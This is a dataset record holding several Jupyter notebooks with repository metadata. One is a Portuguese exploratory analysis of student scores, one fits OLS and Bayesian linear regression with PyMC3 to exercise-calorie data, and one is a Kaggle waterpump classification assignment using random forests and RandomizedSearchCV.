[
"# Biblioteca para visualizações\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport plotly.express as px\r\nimport dabl",
"_____no_output_____"
]
],
[
[
"###Para ler o conjunto de dados:",
"_____no_output_____"
]
],
[
[
"data = pd.read_csv(\"/content/Students.csv\",encoding='ISO-8859-1')",
"_____no_output_____"
],
[
"# obtendo a forma dos dados\r\nprint(data.shape)\r\n# (quantidades de linhas ou dados, quantidades de colinas ou categorias)",
"(1000, 8)\n"
]
],
[
[
"###Para olhar para os primeiros 30 registros no conjunto de dados",
"_____no_output_____"
]
],
[
[
"data.head(30)",
"_____no_output_____"
]
],
[
[
"###Estatísticas Descritivas",
"_____no_output_____"
]
],
[
[
"data.describe()\r\n#count = Contagem total de linhas\r\n#mean = Valor Médio\r\n#std = Desvio Padrão\r\n#min = Valor Mínimo\r\n#25% = valor dos 25%\r\n#50% = valor dos 50%\r\n#75% = valor dos 75%\r\n#max = Valor Máximo\r\n",
"_____no_output_____"
]
],
[
[
"###Vamos verificar o não de itens únicos presentes na coluna categórica.",
"_____no_output_____"
]
],
[
[
"data.select_dtypes('object').nunique()",
"_____no_output_____"
]
],
[
[
"###Vamos verificar a porcentagem de dados perdidos em cada coluna presente nos dados:",
"_____no_output_____"
]
],
[
[
"no_of_columns = data.shape[0]\r\npercentage_of_missing_data = data.isnull().sum()/no_of_columns\r\nprint(percentage_of_missing_data)",
"gender 0.0\nrace/ethnicity 0.0\nparental level of education 0.0\nlunch 0.0\ntest preparation course 0.0\nmath score 0.0\nreading score 0.0\nwriting score 0.0\ndtype: float64\n"
]
],
[
[
"###Para ver a comparação de todos os outros atributos em relação às marcas matemáticas.",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (18, 6)\r\nplt.style.use('fivethirtyeight')\r\ndabl.plot(data, target_col = 'math score')",
"Target looks like regression\n"
]
],
[
[
"###Comparação de todos os outros atributos em relação às marcas de leitura :\r\n",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (18, 6)\r\nplt.style.use('fivethirtyeight')\r\ndabl.plot(data, target_col = 'reading score')",
"Target looks like regression\n"
]
],
[
[
"###Vamos verificar o efeito do almoço na performance do aluno:",
"_____no_output_____"
]
],
[
[
"data[['lunch','gender','math score','writing score',\r\n 'reading score']].groupby(['lunch','gender']).agg('median')",
"_____no_output_____"
]
],
[
[
"###Vamos verificar o efeito do curso de preparação de testes em pontuações:\r\n\r\n",
"_____no_output_____"
]
],
[
[
"data[['test preparation course',\r\n 'gender',\r\n 'math score',\r\n 'writing score',\r\n 'reading score']].groupby(['test preparation course','gender']).agg('median')",
"_____no_output_____"
]
],
[
[
"# Visualizações de dados\r\n### Visualizando o número de homens e mulheres no conjunto de dados",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (15, 5)\r\nsns.countplot(data['gender'], palette = 'bone')\r\nplt.title('Comparison of Males and Females', fontweight = 30)\r\nplt.xlabel('Gender')\r\nplt.ylabel('Count')\r\nplt.show()",
"/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning:\n\nPass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation.\n\n"
]
],
[
[
"### Visualizando os diferentes grupos no conjunto de dados:",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (15, 9)\r\nplt.style.use('ggplot')\r\nsns.countplot(data['race/ethnicity'], palette = 'pink')\r\nplt.title('Comparison of various groups', fontweight = 30, fontsize = 20)\r\nplt.xlabel('Groups')\r\nplt.ylabel('count')\r\nplt.show()",
"/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning:\n\nPass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation.\n\n"
]
],
[
[
"###Visualizando os diferentes níveis de educação parental:",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = (15, 9)\r\nplt.style.use('fivethirtyeight')\r\nsns.countplot(data['parental level of education'], palette = 'Blues')\r\nplt.title('Comparison of Parental Education', fontweight = 30, fontsize = 20)\r\nplt.xlabel('Degree')\r\nplt.ylabel('count')\r\nplt.show()",
"/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning:\n\nPass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation.\n\n"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2c74a6226e0fb30506b46f723b3ba586bc6404 | 92,956 | ipynb | Jupyter Notebook | bayesian_lr/.ipynb_checkpoints/Bayesian Linear Regression Demonstration-checkpoint.ipynb | reed9999/koehrsen-for-timeseries | bb2d57a1b2de55f03cb7e09ef71f8b88a859c559 | [
"MIT"
] | 5 | 2019-06-25T21:01:17.000Z | 2021-07-23T13:47:29.000Z | bayesian_lr/.ipynb_checkpoints/Bayesian Linear Regression Demonstration-checkpoint.ipynb | reed9999/koehrsen-for-timeseries | bb2d57a1b2de55f03cb7e09ef71f8b88a859c559 | [
"MIT"
] | null | null | null | bayesian_lr/.ipynb_checkpoints/Bayesian Linear Regression Demonstration-checkpoint.ipynb | reed9999/koehrsen-for-timeseries | bb2d57a1b2de55f03cb7e09ef71f8b88a859c559 | [
"MIT"
] | 3 | 2020-03-04T00:24:27.000Z | 2021-12-04T19:47:20.000Z | 139.155689 | 47,304 | 0.867604 | [
[
[
"# Basic Bayesian Linear Regression Implementation",
"_____no_output_____"
]
],
[
[
"# Pandas and numpy for data manipulation\nimport pandas as pd\nimport numpy as np\n\n# Matplotlib and seaborn for visualization\nimport matplotlib.pyplot as plt\n%matplotlib inline \n\nimport seaborn as sns\n\n# Linear Regression to verify implementation\nfrom sklearn.linear_model import LinearRegression\n\n# Scipy for statistics\nimport scipy\n\n# PyMC3 for Bayesian Inference\nimport pymc3 as pm",
"WARNING (theano.tensor.blas): Using NumPy C-API based implementation for BLAS functions.\n"
]
],
[
[
"# Load in Exercise Data",
"_____no_output_____"
]
],
[
[
"exercise = pd.read_csv('data/exercise.csv')\ncalories = pd.read_csv('data/calories.csv')\ndf = pd.merge(exercise, calories, on = 'User_ID')\ndf = df[df['Calories'] < 300]\ndf = df.reset_index()\ndf['Intercept'] = 1\ndf.head()",
"_____no_output_____"
]
],
[
[
"# Plot Relationship",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(8, 8))\n\nplt.plot(df['Duration'], df['Calories'], 'bo');\nplt.xlabel('Duration (min)', size = 18); plt.ylabel('Calories', size = 18); \nplt.title('Calories burned vs Duration of Exercise', size = 20);",
"_____no_output_____"
],
[
"# Create the features and response\nX = df.loc[:, ['Intercept', 'Duration']]\ny = df.ix[:, 'Calories']",
"_____no_output_____"
]
],
[
[
"# Implement Ordinary Least Squares Linear Regression by Hand",
"_____no_output_____"
]
],
[
[
"# Takes a matrix of features (with intercept as first column) \n# and response vector and calculates linear regression coefficients\ndef linear_regression(X, y):\n # Equation for linear regression coefficients\n beta = np.matmul(np.matmul(np.linalg.inv(np.matmul(X.T, X)), X.T), y)\n return beta",
"_____no_output_____"
],
[
"# Run the by hand implementation\nby_hand_coefs = linear_regression(X, y)\nprint('Intercept calculated by hand:', by_hand_coefs[0])\nprint('Slope calculated by hand: ', by_hand_coefs[1])",
"Intercept calculated by hand: -21.82810252605084\nSlope calculated by hand: 7.169783349587853\n"
],
[
"xs = np.linspace(4, 31, 1000)\nys = by_hand_coefs[0] + by_hand_coefs[1] * xs\n\nplt.figure(figsize=(8, 8))\nplt.plot(df['Duration'], df['Calories'], 'bo', label = 'observations', alpha = 0.8);\nplt.xlabel('Duration (min)', size = 18); plt.ylabel('Calories', size = 18); \nplt.plot(xs, ys, 'r--', label = 'OLS Fit', linewidth = 3)\nplt.legend(prop={'size': 16})\nplt.title('Calories burned vs Duration of Exercise', size = 20);",
"_____no_output_____"
]
],
[
[
"## Prediction for Datapoint",
"_____no_output_____"
]
],
[
[
"print('Exercising for 15.5 minutes will burn an estimated {:.2f} calories.'.format(\n by_hand_coefs[0] + by_hand_coefs[1] * 15.5))",
"Exercising for 15.5 minutes will burn an estimated 89.30 calories.\n"
]
],
[
[
"# Verify with Scikit-learn Implementation",
"_____no_output_____"
]
],
[
[
"# Create the model and fit on the data\nlr = LinearRegression()\nlr.fit(X.Duration.reshape(-1, 1), y)\nprint('Intercept from library:', lr.intercept_)\nprint('Slope from library:', lr.coef_[0])",
"Intercept from library: -21.828102526050813\nSlope from library: 7.169783349587853\n"
]
],
[
[
"# Bayesian Linear Regression\n\n### PyMC3 for Bayesian Inference\n\nImplement MCMC to find the posterior distribution of the model parameters. Rather than a single point estimate of the model weights, Bayesian linear regression will give us a posterior distribution for the model weights.",
"_____no_output_____"
],
[
"## Model with 500 Observations",
"_____no_output_____"
]
],
[
[
"with pm.Model() as linear_model_500:\n # Intercept\n intercept = pm.Normal('Intercept', mu = 0, sd = 10)\n \n # Slope \n slope = pm.Normal('slope', mu = 0, sd = 10)\n \n # Standard deviation\n sigma = pm.HalfNormal('sigma', sd = 10)\n \n # Estimate of mean\n mean = intercept + slope * X.loc[0:499, 'Duration']\n \n # Observed values\n Y_obs = pm.Normal('Y_obs', mu = mean, sd = sigma, observed = y.values[0:500])\n \n # Sampler\n step = pm.NUTS()\n\n # Posterior distribution\n linear_trace_500 = pm.sample(1000, step)",
"_____no_output_____"
]
],
[
[
"## Model with all Observations",
"_____no_output_____"
]
],
[
[
"with pm.Model() as linear_model:\n # Intercept\n intercept = pm.Normal('Intercept', mu = 0, sd = 10)\n \n # Slope \n slope = pm.Normal('slope', mu = 0, sd = 10)\n \n # Standard deviation\n sigma = pm.HalfNormal('sigma', sd = 10)\n \n # Estimate of mean\n mean = intercept + slope * X.loc[:, 'Duration']\n \n # Observed values\n Y_obs = pm.Normal('Y_obs', mu = mean, sd = sigma, observed = y.values)\n \n # Sampler\n step = pm.NUTS()\n\n # Posterior distribution\n linear_trace = pm.sample(1000, step)",
"Multiprocess sampling (2 chains in 2 jobs)\nNUTS: [sigma_log__, slope, Intercept]\n"
]
],
[
[
"# Bayesian Model Results\n\nThe Bayesian Model provides more opportunities for interpretation than the ordinary least squares regression because it provides a posterior distribution. We can use this distribution to find the most likely single value as well as the entire range of likely values for our model parameters.\n\nPyMC3 has many built in tools for visualizing and inspecting model runs. These let us see the distributions and provide estimates with a level of uncertainty, which should be a necessary part of any model.",
"_____no_output_____"
],
[
"## Trace of All Model Parameters",
"_____no_output_____"
]
],
[
[
"pm.traceplot(linear_trace, figsize = (12, 12));",
"_____no_output_____"
]
],
[
[
"## Posterior Distribution of Model Parameters",
"_____no_output_____"
]
],
[
[
"pm.plot_posterior(linear_trace, figsize = (12, 10), text_size = 20);",
"_____no_output_____"
]
],
[
[
"## Confidence Intervals for Model Parameters",
"_____no_output_____"
]
],
[
[
"pm.forestplot(linear_trace);",
"_____no_output_____"
]
],
[
[
"# Predictions of Response Sampled from the Posterior\n\nWe can now generate predictions of the linear regression line using the model results. The following plot shows 1000 different estimates of the regression line drawn from the posterior. The distribution of the lines gives an estimate of the uncertainty in the estimate. Bayesian Linear Regression has the benefit that it gives us a posterior __distribution__ rather than a __single point estimate__ in the frequentist ordinary least squares regression.",
"_____no_output_____"
],
[
"## All Observations",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize = (8, 8))\npm.plot_posterior_predictive_glm(linear_trace, samples = 100, eval=np.linspace(2, 30, 100), linewidth = 1, \n color = 'red', alpha = 0.8, label = 'Bayesian Posterior Fits',\n lm = lambda x, sample: sample['Intercept'] + sample['slope'] * x);\nplt.scatter(X['Duration'], y.values, s = 12, alpha = 0.8, c = 'blue', label = 'Observations')\nplt.plot(X['Duration'], by_hand_coefs[0] + X['Duration'] * by_hand_coefs[1], 'k--', label = 'OLS Fit', linewidth = 1.4)\nplt.title('Posterior Predictions with all Observations', size = 20); plt.xlabel('Duration (min)', size = 18);\nplt.ylabel('Calories', size = 18);\nplt.legend(prop={'size': 16});",
"_____no_output_____"
],
[
"pm.df_summary(linear_trace)",
"_____no_output_____"
]
],
[
[
"## Limited Observations",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize = (8, 8))\npm.plot_posterior_predictive_glm(linear_trace_500, samples = 100, eval=np.linspace(2, 30, 100), linewidth = 1, \n color = 'red', alpha = 0.8, label = 'Bayesian Posterior Fits',\n lm = lambda x, sample: sample['Intercept'] + sample['slope'] * x);\nplt.scatter(X['Duration'][:500], y.values[:500], s = 12, alpha = 0.8, c = 'blue', label = 'Observations')\nplt.plot(X['Duration'], by_hand_coefs[0] + X['Duration'] * by_hand_coefs[1], 'k--', label = 'OLS Fit', linewidth = 1.4)\nplt.title('Posterior Predictions with Limited Observations', size = 20); plt.xlabel('Duration (min)', size = 18);\nplt.ylabel('Calories', size = 18);\nplt.legend(prop={'size': 16});",
"_____no_output_____"
],
[
"pm.df_summary(linear_trace_500)",
"_____no_output_____"
]
],
[
[
"# Specific Prediction for One Datapoint",
"_____no_output_____"
]
],
[
[
"bayes_prediction = linear_trace['Intercept'] + linear_trace['slope'] * 15.5",
"_____no_output_____"
],
[
"plt.figure(figsize = (8, 8))\nplt.style.use('fivethirtyeight')\nsns.kdeplot(bayes_prediction, label = 'Bayes Posterior Prediction')\nplt.vlines(x = by_hand_coefs[0] + by_hand_coefs[1] * 15.5, \n ymin = 0, ymax = 2.5, \n label = 'OLS Prediction',\n colors = 'red', linestyles='--')\nplt.legend();\nplt.xlabel('Calories Burned', size = 18), plt.ylabel('Probability Density', size = 18);\nplt.title('Posterior Prediction for 15.5 Minutes', size = 20);",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2c74cd6341e82fcdb5879fa6ae9cb45e4e55aa | 66,848 | ipynb | Jupyter Notebook | module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb | hoops92/DS-Unit-2-Kaggle-Challenge | 1ebdac9f196ec1fe451189ab9b74d54e99d81dc5 | [
"MIT"
] | null | null | null | module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb | hoops92/DS-Unit-2-Kaggle-Challenge | 1ebdac9f196ec1fe451189ab9b74d54e99d81dc5 | [
"MIT"
] | null | null | null | module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb | hoops92/DS-Unit-2-Kaggle-Challenge | 1ebdac9f196ec1fe451189ab9b74d54e99d81dc5 | [
"MIT"
] | null | null | null | 56.26936 | 452 | 0.353608 | [
[
[
"<a href=\"https://colab.research.google.com/github/hoops92/DS-Unit-2-Kaggle-Challenge/blob/master/module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"Lambda School Data Science\n\n*Unit 2, Sprint 2, Module 3*\n\n---",
"_____no_output_____"
],
[
"# Cross-Validation\n\n\n## Assignment\n- [ ] [Review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.\n- [ ] Continue to participate in our Kaggle challenge. \n- [ ] Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.\n- [ ] Submit your predictions to our Kaggle competition. (Go to our Kaggle InClass competition webpage. Use the blue **Submit Predictions** button to upload your CSV file. Or you can use the Kaggle API to submit your predictions.)\n- [ ] Commit your notebook to your fork of the GitHub repo.\n\n\nYou won't be able to just copy from the lesson notebook to this assignment.\n\n- Because the lesson was ***regression***, but the assignment is ***classification.***\n- Because the lesson used [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html), which doesn't work as-is for _multi-class_ classification.\n\nSo you will have to adapt the example, which is good real-world practice.\n\n1. Use a model for classification, such as [RandomForestClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html)\n2. Use hyperparameters that match the classifier, such as `randomforestclassifier__ ...`\n3. Use a metric for classification, such as [`scoring='accuracy'`](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values)\n4. If you’re doing a multi-class classification problem — such as whether a waterpump is functional, functional needs repair, or nonfunctional — then use a categorical encoding that works for multi-class classification, such as [OrdinalEncoder](https://contrib.scikit-learn.org/categorical-encoding/ordinal.html) (not [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html))\n\n\n\n## Stretch Goals\n\n### Reading\n- Jake VanderPlas, [Python Data Science Handbook, Chapter 5.3](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html), Hyperparameters and Model Validation\n- Jake VanderPlas, [Statistics for Hackers](https://speakerdeck.com/jakevdp/statistics-for-hackers?slide=107)\n- Ron Zacharski, [A Programmer's Guide to Data Mining, Chapter 5](http://guidetodatamining.com/chapter5/), 10-fold cross validation\n- Sebastian Raschka, [A Basic Pipeline and Grid Search Setup](https://github.com/rasbt/python-machine-learning-book/blob/master/code/bonus/svm_iris_pipeline_and_gridsearch.ipynb)\n- Peter Worcester, [A Comparison of Grid Search and Randomized Search Using Scikit Learn](https://blog.usejournal.com/a-comparison-of-grid-search-and-randomized-search-using-scikit-learn-29823179bc85)\n\n### Doing\n- Add your own stretch goals!\n- Try other [categorical encodings](https://contrib.scikit-learn.org/categorical-encoding/). See the previous assignment notebook for details.\n- In additon to `RandomizedSearchCV`, scikit-learn has [`GridSearchCV`](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html). Another library called scikit-optimize has [`BayesSearchCV`](https://scikit-optimize.github.io/notebooks/sklearn-gridsearchcv-replacement.html). Experiment with these alternatives.\n- _[Introduction to Machine Learning with Python](http://shop.oreilly.com/product/0636920030515.do)_ discusses options for \"Grid-Searching Which Model To Use\" in Chapter 6:\n\n> You can even go further in combining GridSearchCV and Pipeline: it is also possible to search over the actual steps being performed in the pipeline (say whether to use StandardScaler or MinMaxScaler). This leads to an even bigger search space and should be considered carefully. Trying all possible solutions is usually not a viable machine learning strategy. However, here is an example comparing a RandomForestClassifier and an SVC ...\n\nThe example is shown in [the accompanying notebook](https://github.com/amueller/introduction_to_ml_with_python/blob/master/06-algorithm-chains-and-pipelines.ipynb), code cells 35-37. Could you apply this concept to your own pipelines?\n",
"_____no_output_____"
],
[
"### BONUS: Stacking!\n\nHere's some code you can use to \"stack\" multiple submissions, which is another form of ensembling:\n\n```python\nimport pandas as pd\n\n# Filenames of your submissions you want to ensemble\nfiles = ['submission-01.csv', 'submission-02.csv', 'submission-03.csv']\n\ntarget = 'status_group'\nsubmissions = (pd.read_csv(file)[[target]] for file in files)\nensemble = pd.concat(submissions, axis='columns')\nmajority_vote = ensemble.mode(axis='columns')[0]\n\nsample_submission = pd.read_csv('sample_submission.csv')\nsubmission = sample_submission.copy()\nsubmission[target] = majority_vote\nsubmission.to_csv('my-ultimate-ensemble-submission.csv', index=False)\n```",
"_____no_output_____"
]
],
[
[
"%%capture\nimport sys\n\n# If you're on Colab:\nif 'google.colab' in sys.modules:\n DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'\n !pip install category_encoders==2.*\n\n# If you're working locally:\nelse:\n DATA_PATH = '../data/'",
"_____no_output_____"
],
[
"import pandas as pd\n\n# Merge train_features.csv & train_labels.csv\ntrain = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'), \n pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))\n\n# Read test_features.csv & sample_submission.csv\ntest = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')\nsample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')",
"_____no_output_____"
]
],
[
[
"## Define a function to wrangle train, validate, and test sets in the same way. Clean outliers and engineer features.",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\ndef wrangle(X):\n \"\"\"Wrangle train, validate, and test sets in the same way\"\"\"\n \n # Prevent SettingWithCopyWarning\n X = X.copy()\n \n # About 3% of the time, latitude has small values near zero,\n # outside Tanzania, so we'll treat these values like zero.\n X['latitude'] = X['latitude'].replace(-2e-08, 0)\n \n # When columns have zeros and shouldn't, they are like null values.\n # So we will replace the zeros with nulls, and impute missing values later.\n cols_with_zeros = ['longitude', 'latitude', 'construction_year',\n 'gps_height','population','amount_tsh']\n for col in cols_with_zeros:\n X[col] = X[col].replace(0, np.nan)\n X[col+'_MISSING'] = X[col].isnull()\n \n # Approximate distance from 'Null Island'\n X['distance'] = ((X['latitude']+10.99846435)**2 + (X['longitude']-19.6071219)**2)**.5\n\n # Convert to datetime and create year_ month_ & day_recorded\n X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)\n X['year_recorded'] = X['date_recorded'].dt.year\n X['month_recorded'] = X['date_recorded'].dt.month\n X['day_recorded'] = X['date_recorded'].dt.day\n X = X.drop(columns='date_recorded')\n\n # Engineer feature: how many years from construction_year to date_recorded\n X['years'] = X['year_recorded'] - X['construction_year']\n X['years_MISSING'] = X['years'].isnull()\n\n # region_code & district_code are numeric columns, but should be categorical features,\n # so convert it from a number to a string\n X['region_code'] = X['region_code'].astype(str)\n X['district_code'] = X['district_code'].astype(str)\n \n # quantity & quantity_group are duplicates, so drop one\n X = X.drop(columns='quantity_group')\n \n # source, source_class & source_type are almost identical. \n # source has higher level of detail.\n X = X.drop(columns=['source_class','source_type'])\n\n # recorded_by has single value, so drop.\n X = X.drop(columns='recorded_by')\n\n X = X.drop(columns='id')\n\n # water_quality & quality_group are almost identical. \n # water_quality has higher level of detail.\n X = X.drop(columns='quality_group')\n\n # waterpoint_type & waterpoint_type_group are almost identical. \n # waterpoint_type has higher level of detail.\n X = X.drop(columns='waterpoint_type_group')\n\n # payment & payment_type are duplicates, so drop one\n X = X.drop(columns='payment_type')\n\n # extraction_type, extraction_type_class & extraction_type_group are almost identical. \n # extraction_type has higher level of detail.\n X = X.drop(columns=['extraction_type_class','extraction_type_group'])\n\n # installer & funder are almost identical. \n # funder has higher level of detail.\n X = X.drop(columns='installer') \n \n # management & management_group are almost identical. \n # management has higher level of detail.\n X = X.drop(columns='management_group') \n\n # region_code & region are almost identical. \n # region_code has higher level of detail.\n X = X.drop(columns='region') \n\n # return the wrangled dataframe\n return X\n\ntrain = wrangle(train)\ntest = wrangle(test)",
"_____no_output_____"
]
],
[
[
"## Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.",
"_____no_output_____"
]
],
[
[
"pip install category_encoders",
"Requirement already satisfied: category_encoders in c:\\users\\jj\\anaconda3\\lib\\site-packages (2.1.0)\nRequirement already satisfied: statsmodels>=0.6.1 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (0.10.1)\nRequirement already satisfied: scipy>=0.19.0 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (1.3.1)\nRequirement already satisfied: numpy>=1.11.3 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (1.16.5)\nRequirement already satisfied: pandas>=0.21.1 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (0.25.1)\nRequirement already satisfied: scikit-learn>=0.20.0 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (0.21.3)\nRequirement already satisfied: patsy>=0.4.1 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (0.5.1)\nRequirement already satisfied: pytz>=2017.2 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from pandas>=0.21.1->category_encoders) (2019.3)\nRequirement already satisfied: python-dateutil>=2.6.1 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from pandas>=0.21.1->category_encoders) (2.8.0)\nRequirement already satisfied: joblib>=0.11 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from scikit-learn>=0.20.0->category_encoders) (0.13.2)\nRequirement already satisfied: six in c:\\users\\jj\\anaconda3\\lib\\site-packages (from patsy>=0.4.1->category_encoders) (1.12.0)\nNote: you may need to restart the kernel to use updated packages.\n"
],
[
"import category_encoders as ce\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import randint, uniform",
"_____no_output_____"
],
[
"%%time\n\ntarget = 'status_group'\n\nfeatures = train.columns.drop(target)\nX_train = train[features]\ny_train = train[target]\n\n\npipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(strategy='median'), \n RandomForestClassifier(n_estimators=100, max_depth=22, n_jobs=-1, random_state=42)\n)\n\nk = 5\nscores = cross_val_score(pipeline, X_train, y_train, cv=k, \n scoring='accuracy')\nprint(f'Accuracy for {k} folds:', scores)",
"Accuracy for 5 folds: [0.81163202 0.80843363 0.80833333 0.81026936 0.8103216 ]\nWall time: 1min 16s\n"
],
[
"%%time\n\ntarget = 'status_group'\n\nfeatures = train.columns.drop(target)\nX_train = train[features]\ny_train = train[target]\n\n# y_train_pre = train[target]\n# # Encode target feature, in order to use encoders like Target Encoder\n# encoder = ce.OrdinalEncoder()\n# y_train = encoder.fit_transform(y_train_pre)\n\npipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(strategy='median'), \n RandomForestClassifier(n_estimators=100, max_depth=22, n_jobs=-1, random_state=42)\n)\n\nparam_distributions = {\n# 'targetencoder__min_samples_leaf': randint(1, 15), \n# 'targetencoder__smoothing': uniform(1, 50), \n# 'simpleimputer__strategy': ['mean', 'median'], \n# 'randomforestclassifier__n_estimators': randint(80, 120), \n# 'randomforestclassifier__max_depth': range(16, 24), \n 'randomforestclassifier__max_features': uniform(0.2, 0.8),\n 'randomforestclassifier__criterion': ['gini', 'entropy'],\n}\n\n# If you're on Colab, decrease n_iter & cv parameters\nsearch = RandomizedSearchCV(\n pipeline, \n param_distributions=param_distributions, \n n_iter=10, \n cv=5, \n scoring='accuracy', \n verbose=10, \n return_train_score=True, \n n_jobs=-1\n)\n\nsearch.fit(X_train, y_train);",
"Fitting 5 folds for each of 10 candidates, totalling 50 fits\n"
],
[
"print('Best hyperparameters', search.best_params_)\nprint('Cross-validation Accuracy', search.best_score_)",
"Best hyperparameters {'randomforestclassifier__criterion': 'entropy', 'randomforestclassifier__max_features': 0.2627818360633932}\nCross-validation Accuracy 0.8103030303030303\n"
],
[
"pd.DataFrame(search.cv_results_).sort_values(by='rank_test_score').T",
"_____no_output_____"
]
],
[
[
"## Submit your predictions to DS10 Kaggle competition.",
"_____no_output_____"
]
],
[
[
"pipeline = search.best_estimator_",
"_____no_output_____"
],
[
"y_pred = pipeline.predict(test)\n\n# Makes a dataframe with two columns, id and status_group, \n# and writes to a csv file, without the index\n\n# sample_submission = pd.read_csv('sample_submission.csv')\nsubmission = sample_submission.copy()\nsubmission['status_group'] = y_pred\nsubmission.to_csv('your-submission-filename.csv', index=False)",
"_____no_output_____"
],
[
"# from google.colab import files\n# files.download('your-submission-filename.csv')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb2c985b41ea6cb19a99f573005a3bec8a7830b0 | 30,806 | ipynb | Jupyter Notebook | examples/1.computer_vision/text_recognition/text_recognition.ipynb | lehasm/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 153 | 2021-02-06T13:41:11.000Z | 2022-03-19T17:51:01.000Z | examples/1.computer_vision/text_recognition/text_recognition.ipynb | lehasm/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
